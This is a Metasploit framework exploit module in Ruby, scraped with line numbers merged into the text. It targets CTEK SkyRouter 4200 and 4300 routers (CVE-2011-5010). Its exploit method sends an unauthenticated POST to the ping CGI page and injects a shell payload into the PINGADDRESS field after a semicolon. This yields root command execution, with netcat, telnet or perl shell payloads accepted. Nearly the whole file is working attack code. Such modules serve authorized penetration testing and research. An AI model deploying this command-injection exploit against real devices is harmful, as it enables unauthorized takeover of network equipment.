Path: blob/master/modules/exploits/unix/http/ctek_skyrouter.rb
19664 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::Remote::HttpClient1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'CTEK SkyRouter 4200 and 4300 Command Execution',16'Description' => %q{17This module exploits an unauthenticated remote root exploit within ctek SkyRouter 4200 and 4300.18},19'Author' => [ 'savant42' ], # with module help from kos20'License' => MSF_LICENSE,21'References' => [22['CVE', '2011-5010'],23['OSVDB', '77497']24],25'Privileged' => false,26'Payload' => {27'DisableNops' => true,28'Space' => 1024,29'Compat' =>30{31'PayloadType' => 'cmd',32'RequiredCmd' => 'generic perl telnet netcat netcat-e',33}34},35'Platform' => 'unix',36'Arch' => ARCH_CMD,37'Targets' => [[ 'Automatic', {}]],38'DisclosureDate' => '2011-09-08', # CGI historical date :)39'DefaultTarget' => 0,40'Notes' => {41'Reliability' => UNKNOWN_RELIABILITY,42'Stability' => UNKNOWN_STABILITY,43'SideEffects' => UNKNOWN_SIDE_EFFECTS44}45)46)47end4849def exploit50post_data = "MYLINK=%2Fapps%2Fa3%2Fcfg_ethping.cgi&CMD=u&PINGADDRESS=;" + Rex::Text.uri_encode(payload.encoded) + "+%26"51uri = '/apps/a3/cfg_ethping.cgi'52print_status("Sending HTTP request for #{uri}")53res = send_request_cgi({54'global' => true,55'uri' => uri,56'method' => "POST",57'data' => post_data58}, 30)5960if res61print_status("The server responded with HTTP CODE #{res.code}")62else63print_status("The server did not respond to our request")64end6566handler67end68end697071